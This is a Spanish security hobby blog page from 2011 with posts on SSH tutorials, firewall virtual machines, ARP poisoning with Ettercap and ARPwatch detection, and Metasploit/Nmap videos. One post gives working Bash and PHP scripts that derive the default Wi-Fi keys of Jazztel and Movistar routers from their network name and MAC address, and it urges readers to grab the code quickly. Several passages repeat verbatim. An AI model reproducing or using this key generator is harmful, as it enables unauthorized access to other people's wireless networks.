En este primer vídeo dividido en 2 os dejo una segunda parte de la configuracion, siguiendo un esquema de las maquinas virtuales necesarias para hacer un firewall. Una de ellas hace de firewall (un linux) y otras dos serán dos subredes (una linux y un XP)...CONTINUARA
Páginas
- Página principal
- Acerca de…
- Aplicaciones esenciales
- Wallpapers en HD
- Libros & Manuales
- Fotos de motos
- Vídeo-tutoriales
- Graffitis alucinantes
- Serie TV “House”
- Islas preciosas
- Windows 7
- Dns, Bind 9, Nessus
- Vídeos de Gimp
- “Iron Maiden”
- Juegos 3D
- Horror
- “Apocalípsis”
- “Star Wars”
- Fotomontajes
- Windows Server 2003
- Ubuntu
domingo, 27 de febrero de 2011
domingo, 13 de febrero de 2011
miércoles, 9 de febrero de 2011
Routers WIFI al descubierto
Los usuarios de jazztel y movistar que no hayan cambiado el nombre (ESSID) de sus wifis pueden ir pensando en hacerlo: El algoritmo ha sido descifrado. Por lo visto, el que sacó a la luz el algoritmo fue elvecinoo en este hilo de lampiweb En http://kz.ath.cx/wlan/ (entre otros mas que alojan los algoritmos) se ingresa nombre y la MAC del router y te la clava.
Algunos ejemplos:
En BASH:
En PHP:
Algunos ejemplos:
En BASH:
#!/bin/bash
echo CalcWLAN by a.s.r
if [ $# -ne 2 ]
then
echo "Usage: $0 <ESSID> <BSSID>"
echo
echo "Example: $0 WLAN_C58D 64:68:0C:C5:C5:90"
exit 1
fi
HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d)
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)
echo "La puta clave es $KEY"
En PHP:
// THIS CODE IS UNDER THE PUBLIC DOMAIN
function right($string, $chars)
{
return substr($string, strlen($string) - $chars, $chars);
}
if (isset($_POST['essid']) && isset($_POST['bssid']))
{
$bssid = preg_replace('/:/', '', strtoupper(trim($_POST['bssid'])));
if (strlen($bssid) != 12)
{
die('Mete bien la MAC, buen hombre.');
}
$essid = strtoupper(trim($_POST['essid']));
$_ssid = substr($bssid, 0, 8).right($essid, 4);
die(substr(md5('bcgbghgg'.$_ssid.$bssid), 0, 20));
}
Daos prisa antes de que cierren las webs donde se alojan los fuentes.
martes, 8 de febrero de 2011
Protocolo SSH (5 prácticas sencillas)
En estos tutoriales que aquí comienzo, os dejo la primera practica, en la que creo una conexión sencilla a través del protocolo SSH....
En estos segundo tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando un par de claves públicas/privadas...
En este tercer tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando el servidor X incluido en Linux...
En este cuarto tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando el servidor Telnet, que es del todo menos seguro y su uso en Wireshark creando un túnel con SSH para volverlo seguro...
En este ultimo y quinto tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando a un tercero que nos dará acceso a internet, el cual nosotros no poseemos directamente...
En estos segundo tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando un par de claves públicas/privadas...
En este tercer tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando el servidor X incluido en Linux...
En este cuarto tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando el servidor Telnet, que es del todo menos seguro y su uso en Wireshark creando un túnel con SSH para volverlo seguro...
En este ultimo y quinto tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando a un tercero que nos dará acceso a internet, el cual nosotros no poseemos directamente...
Espero que os hayan sido de ayuda...un saludo
OpenSSH (Introducción)
SSH (Secure SHell, en español: intérprete de órdenes segura) es el nombre de un protocolo y del programa que lo implementa, y sirve para acceder a máquinas remotas a través de una red. Permite manejar por completo la computadora mediante un intérprete de comandos, y también puede redirigir el tráfico de X para poder ejecutar programas gráficos si tenemos un Servidor X (en sistemas Unixy Windows) corriendo.
Además de la conexión a otros dispositivos, SSH nos permite copiar datos de forma segura (tanto ficheros sueltos como simular sesiones FTP cifradas), gestionar claves RSA para no escribir claves al conectar a los dispositivos y pasar los datos de cualquier otra aplicación por un canal seguro tunelizado mediante SSH.
OpenSSH (Open Secure Shell) es un conjunto de aplicaciones que permiten realizar comunicaciones cifradas a través de una red, usando el protocolo SSH. Fue creado como una alternativa libre y abierta al programa Secure Shell, que es software propietario. El proyecto está liderado por Theo de Raadt, residente en Calgary.
La suite OpenSSH incluye:
El servidor OpenSSH puede autenticar a los usuarios mediante todos los métodos estándar del protocolo ssh
Además de la conexión a otros dispositivos, SSH nos permite copiar datos de forma segura (tanto ficheros sueltos como simular sesiones FTP cifradas), gestionar claves RSA para no escribir claves al conectar a los dispositivos y pasar los datos de cualquier otra aplicación por un canal seguro tunelizado mediante SSH.
OpenSSH (Open Secure Shell) es un conjunto de aplicaciones que permiten realizar comunicaciones cifradas a través de una red, usando el protocolo SSH. Fue creado como una alternativa libre y abierta al programa Secure Shell, que es software propietario. El proyecto está liderado por Theo de Raadt, residente en Calgary.
La suite OpenSSH incluye:
- ssh, reemplaza a rlogin y telnet para permitir shell el acceso remoto a otra máquina.
ssh tero@ejemplo.com
- scp, reemplaza a rcp
scp tero@ejemplo.com:~/archivo .
- sftp, reemplaza a ftp para copiar archivos entre dos computadoras
sftp tero@ejemplo.com
- sshd, el servidor demonio SSH
sshd
- ssh-keygen, una herramienta para inspeccionar y generar claves RSA y DSA que son usadas para la autenticación del cliente o usuario.
- ssh-agent y ssh-add, herramientas para autenticarse de manera mas fácil, manteniendo las claves listas para no tener que volver a introducir la frase de acceso cada vez que utilice la clave.
- ssh-keyscan, que escanea una lista de clientes y recolecta sus claves públicas.
El servidor OpenSSH puede autenticar a los usuarios mediante todos los métodos estándar del protocolo ssh
domingo, 6 de febrero de 2011
Libros de recomendada lectura...

- Seguridad física...algo tan importante en una empresa como lo sería la seguridad informática del software.
- Documentación sobre iptables-firewall de Linux. Importante a la hora de protegeros en cualquier sistema Linux hoy en dia.
- Guía de Seguridad del Administrador de Linux, traducido y muy recomendable para cualquier administrador de sistemas y seguridad en Linux.
- Introducción al SSH versión 0.2, tema muy importante, sobre todo en seguridad.
- Análisis de seguridad de la familia de protocolos TCP/IP y sus servicios asociados, algo sobre Hacking, pero sobre todo como protegernos de ese protocolo y su familia.
Un saludo. Mike Mars.
Los 10 mandamientos...
Los Mandamientos de Linux
Y habla Dios todo esto, diciendo:
"Yo soy Linux, tu Dios, que te he sacado de la tierra de Microsoft, de la casa de la servidumbre"
- No tendrás otro Dios que a mí, pero te dejo coquetear con cualquier sistema que funcione.
- No instalarás sistemas operativos monopolistas, ni te prosternarás ante ellos, y no los servirás, porque soy un Dios celoso...
- No utilizaras software propietario.
- Navegarás por páginas que soporten Lynx
- No tomarás el nombre de Linux en vano
- Santificarás los demonios y las fiestas jugando al Cibermús.
- Honrarás a los profetas de Linux, a aquellos que contribuyen.
- Cerrarás tu puerto de finger. No saldrás a la red como root.
- No adorarás ídolos en forma de tarjetas multipuerto a 9600 baudios.
- El primer juego que ejecutes será el Xbill, y Sí Matarás.
- Sí adulterarás, y te harás compatible con cuantos sistemas se dejen.
- Realizarás ingeniería inversa.
- No levantarás falso testimonio contra el kernel. No tiene bugs.
Estos mandamientos se resumen en dos:
Amarás a Linux sobre todas las cosas y al OpenSource como a tí mismo.
Origen: desconocido. Autor: desconocido. Obtenido de Fidonet (R34.LINUX)
miércoles, 2 de febrero de 2011
Envenenamiento ARP (Conclusión - VI)
Conclusión
Hemos visto cómo un ataque tan peligroso puede ser llevado a cabo con significativa facilidad haciendo uso de una herramienta que está a disposición de todo el mundo.Si cualquier aficionado es capaz de logar escuchas protegidas y privadas, ¿qué no podrá hacer un experto en redes?. Muchos son los administradores de redes que adjudican tiempo y dinero a soluciones a nivel de red como pueden ser firewalls, firewallsbridge, sistemas de detección y prevención de intrusiones (IDS, IPS respectivamente), etc... pero que son inútiles en este tipo de ataques, en donde el nivel más básico y bajo el cual se sustentan todos los demás niveles queda desprotegido ante cualquier aficionado. Así que no deje descuidada la red si desea mantener la privacidad de sus datos. En caso de pertenecer a una red en donde usted contemple que la seguridad queda en entredicho, no dude consultar al administrador y hacerle saber el problema. Por lo demás, tomemos siempre precauciones, es mejor ser desconfiado.
Mike Mars
Bibliografía
www.google.com
http://es.wikipedia.org
www.monografias.com
http://www.rfceditor.org/rfc/rfc826.txt
http://bulma.net/body.phtml?nIdNoticia=1193
www.secudos.de
http://ettercap.sourceforge.net
http://ditec.um.es/laso/docs/tuttcpip/3376c28.html#figethfram
www.robota.net
www.irongeek.com
http://www.maestrosdelweb.com/editorial/sniffers/
http://www.xombra.com/go_articulo.php?articulo=47
Tutorial V
Tutorial IV
Tutorial III
Tutorial II
Tutorial I
Envenenamiento ARP (Soluciones - V)
Soluciones
5.1 ARPwatch
En sistemas Linux la herramienta ARPWatch ( http://wwwnrg.ee.lbl.gov/) nos puede servir para detectar el uso del envenenamiento ARP en nuestro sistema. Con ARPWatch podemos comprobar la correspondencia entre pares IPMAC (Ethernet). En caso de que un cambio en un par se produzca (esto es, se escuche en el interfaz de red del sistema), ARPWatch envía un correo de notificación del suceso a la cuenta root o administrador del sistema con un mensaje tipo "FLIP FLOP o Change ethernet address" . También podemos monitorizar la existencia de nuevos host (aparición de una nueva MAC en la red).
Envenenamiento ARP (Ettercap - IV)
Ettercap
Una de las herramientas más potentes que hacen uso del envenenamiento ARP en entornos GNU/Linux es Ettercap (http://ettercap.sourceforge.net). Ésta es una herramienta con licencia GPL diseñada con el fin de analizar , filtrar, logear y escuchar determinado tráfico circulando por la red. Soporta disección activa y pasiva de muchos protocolos (incluso los cifrados). Es capaz de realizar ataques MITM (Man in the Middle) entre diferentes hosts de la red , con el fin de entrometerse en su comunicación y obtener información valiosa tipo contraseñas POP, SSH, Telnet, FTP, Https, etc...
Decir que la mayoría de los sistemas operativos (excepto linux 2.4 y solaris 8) no implementan estados en el protocolo arp (aceptan arp replys sin haber enviado antes un request), por lo que facilmente aceptan respuestas ARP y en consecuencia modifican su tabla ARP en caché con cada arpreply recibido.
martes, 1 de febrero de 2011
Metasploit: Uso en Linux y Windows (Parte II)

Después del primer post sobre el Metasploit donde os enseñaba a instalarlo tanto para Linux como Windows, ahora os dejo después de usar el Nmap para descubrir las posibles vulnerabilidades del Windows 2003 y Windows XP SP3 (usados en mis pruebas, bajo VirtualBox) como se usa para explotar esa vulnerabilidad en ambos sistemas...espero que os sirva.
En cuanto descubra nuevas posibilidades os dejaré mas vídeos....un saludo a todos:)
Descubre vulnerabilidades con Nmap en Linux / Windows

Para ello usaremos el Nmap para Linux / Windows.
Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.
Suscribirse a:
Entradas (Atom)